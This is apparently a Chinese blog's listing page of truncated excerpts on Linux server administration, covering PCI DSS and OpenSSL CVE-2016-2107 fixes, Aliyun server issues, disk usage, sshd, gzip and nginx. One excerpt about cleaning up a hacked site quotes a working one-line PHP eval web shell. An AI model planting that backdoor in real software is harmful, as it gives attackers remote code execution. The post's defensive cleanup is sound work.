PCI DSS 不合规解决方案
2020/05/14 更新PCI DSS 不合规和 SSL CVE-2016-2107 漏洞修复 都需要重新检测,SSL CVE-2016-2107 漏洞修复 里面提到的 专项测试 可能因为网络状态一直无法返回结果,国外的 SSL 检测网站 也因为网络状态查询速度较慢,推荐使用 国内的测试。为什么按照要求更新了 OpenSSL 版本,也修改了 TLS 协议相关的配置,但检测结果仍然不理想呢?不管是
2020/05/14 更新PCI DSS 不合规和 SSL CVE-2016-2107 漏洞修复 都需要重新检测,SSL CVE-2016-2107 漏洞修复 里面提到的 专项测试 可能因为网络状态一直无法返回结果,国外的 SSL 检测网站 也因为网络状态查询速度较慢,推荐使用 国内的测试。为什么按照要求更新了 OpenSSL 版本,也修改了 TLS 协议相关的配置,但检测结果仍然不理想呢?不管是
鉴于 SSL CVE-2016-2107 漏洞,需要对服务上 OpenSSL 进行升级。通过 openssl version 得到系统安装的 OpenSSL 版本号:1.0.1e-fip,对应升级版本为 1.0.1t。1、下载 openssl-1.0.1t[seasidecrab]# wget https://www.openssl.org/source/openssl-1.0.1t.tar.gz
漏洞描述国外安全专家发现了一种新型中间人攻击方式,漏洞编号为 CVE-2016-2107。当客户端使用 AES_128(256)_CBC 相关的加密套件与服务器(需支持 AES-NI 指令)通信时,攻击者可通过截获客户端和服务器的通信数据,并利用填充数据块的方式解密通信原文,实现中间人劫持。漏洞检测CVE-2016-2107 test(专项测试)SSL Server Test(国内)SSL Ser
情况说明之前的领导离职后,让我接手阿里云服务器。原有的服务器我是不敢动的,不管它报了多少的警告和待处理事务。昨天更换账号绑定的手机号,试了我的手机号,提示绑定了太多账号了。换成公司行政的手机号,通过了。准备注销登录时,瞄了一眼账户余额,发现只有 100 出头的样子,这让我心生疑惑。因为上周刚充值了 200 的余额,我计算过所有后付费项每天的开销,一个月的开销也就有在 130 - 140 这样子,怎
阿里云服务器系统盘正常为 40 个 G,照理说是用不完的,但今天查看的时候发现,空间似乎有点不够用了。df -lhFilesystemSizeUsedAvailUse%Mounted on /dev/vda140G28G9.9G74%/ tmpfs939M0939M0%/dev/shm 然后就想着看一下,空间具体是那些文件占用了,想要照着 Windows 系统一下,查看一下主要的文件夹占用空间的大
最新处理方案参考网友的解决思路,下载博客的全部源码到本地,使用工具进行查杀。使用 D盾_防火墙(只支持 windows 系统) ,自定义扫描,选择目录之后,自动开始。查杀文件 install.inc.php,存在 eval 后门。<?php @eval($_POST[install]);?>网站入口文件两次被挂马,大概率是这个文件在作怪,直接删除(或者放入沙盒)即可。分析沙盒中的木马文
同: ssh: connect to host 121.43.60.204 port 22: Connection refused检查服务器登录用户的时候,发现有多个远程登录进程 pts/0、pts/1。从 last 登录记录没有太大问题,但还是想清一下进程,用了 pkill sshd (不建议使用)。然后就发现退出了当前远程登录,再次尝试登录就直接报错:connection refused。从错
适合 gzip 压缩的情况压缩的好处都知道,传输资源体积减小,传输时间成本降低,消耗的流量降低,一定程度上提升网站用户体验。但不是所有情况下都适合开启 gzip 压缩的,比如前端的资源如 css,js 之类都被 webpack 打包过了,单个文件已经足够小的情况下,或者都是些压缩率较低的文件(图片、音频、视频、pdf等等)。这些情况就不合适或者没有必要,因为开启 gzip 压缩本身也是要消耗服务器
检测环境服务器环境: 阿里云 ESC 服务器,CentOS 7.6。前言之前写过一篇文章 centos 安装、配置 ftp 和操作用户,里面介绍了通过 yum 安装 vsftpd 的过程,其中第一步就是通过 rpm 指令检测 vsftpd 是否安装:rpm -qa | grep vsftpd。rpm 指令能够检测到的只有通过 rpm 或者 yum 进行安装的软件包,如果是通过其他方式安装的软件,是
前面搭建了一个 Nginx 文件服务器,只是简单的展示了一下目录。现通过 autoindex 页面功能的配置来达到美化 nginx 目录的效果(参考网上教程)。autoindex on 配置展示 nginx 目录的默认版比较简单,样式也不太好看。新版有 github 风格,当然还有些差距。主要改进点如下:使用 nginx 的 autoindex 页脚(footer) 功能添加 javascript